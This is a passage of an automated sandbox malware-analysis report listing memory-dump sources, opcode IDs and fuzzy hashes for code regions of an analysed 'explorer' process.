                                                                          • Instruction Fuzzy Hash: 34714821F1DA8E0FE795AB7C98656B97BE2EF89210F0501BAD05DC32E7DD286C428341
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2409463777.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ffd9b880000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e54d39fc68707f740ed5252c2ca519db3ad130a4717eed67432dca442efb8719
                                                                          • Instruction ID: fc53ef35fbc56427654692724ac07c8c952d01e568a09a381b75bc41acbf4f5d
                                                                          • Opcode Fuzzy Hash: e54d39fc68707f740ed5252c2ca519db3ad130a4717eed67432dca442efb8719
                                                                          • Instruction Fuzzy Hash: B8512120B0EAC94FD79AAB7898756756BD1DF8A219B0804FBE0DDC71E7DD285806C342
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2409463777.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ffd9b880000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b29ed6e5d1b0947f7ce22ce79a3c8f3c9318c10e54e33f9869407e1d66a9a4b8
                                                                          • Instruction ID: 06830b3215d54ed3554cd53b5af0075b217c3e50948e0e85983eb7a7adf5f672
                                                                          • Opcode Fuzzy Hash: b29ed6e5d1b0947f7ce22ce79a3c8f3c9318c10e54e33f9869407e1d66a9a4b8
                                                                          • Instruction Fuzzy Hash: 2F31E621B18D484FE798FB2C986AA79A6C2EFDC705F0905BEE05EC32D7DE649C418341
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2409463777.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ffd9b880000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7d6abe3c1591bb16099986c87093b7589fdc05cefd027523eaa3713064a27b6e
                                                                          • Instruction ID: 5263dbd456e51007274b8b16f93300e2e13176e724d34df04136f01fbcbf9431
                                                                          • Opcode Fuzzy Hash: 7d6abe3c1591bb16099986c87093b7589fdc05cefd027523eaa3713064a27b6e
                                                                          • Instruction Fuzzy Hash: 22319570B1890E8FDB48EBB89865AFE7BB1FF88300F500575D019D32C6DE38A9428751
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2409463777.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ffd9b880000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e5efa6137fccaae6be491e78b99b366822d4d63ceb7968d368018f731797167a
                                                                          • Instruction ID: a5d900e5412a5c150af5e34c75cb05395fd1c64aec9c9194bc4af4206cf214d3
                                                                          • Opcode Fuzzy Hash: e5efa6137fccaae6be491e78b99b366822d4d63ceb7968d368018f731797167a
                                                                          • Instruction Fuzzy Hash: FC21A351B2DE4A4FE75977B85C29BB876D2EFA8740F0501BAE02CC32D7DD28A9414782
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2409463777.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ffd9b880000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 44b522c1eac8834ed6ec9139d56a2a5a3703d53f0f9aee3e706e2dbe2a73fa32
                                                                          • Instruction ID: e159134ddc098bcb37bb456e8bfcb2ca8b16f7f1b4a234d2772a424d3582fdda
                                                                          • Opcode Fuzzy Hash: 44b522c1eac8834ed6ec9139d56a2a5a3703d53f0f9aee3e706e2dbe2a73fa32
                                                                          • Instruction Fuzzy Hash: 69016B11B0EA994FE36073386864471BFE0CF8E220B0905BBE499C60EBDD295A854342
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2409463777.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ffd9b880000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: edf27a62abc4d3db22280f4b4c4b814dbb3b702da6d8e87b617715996ec4b4e8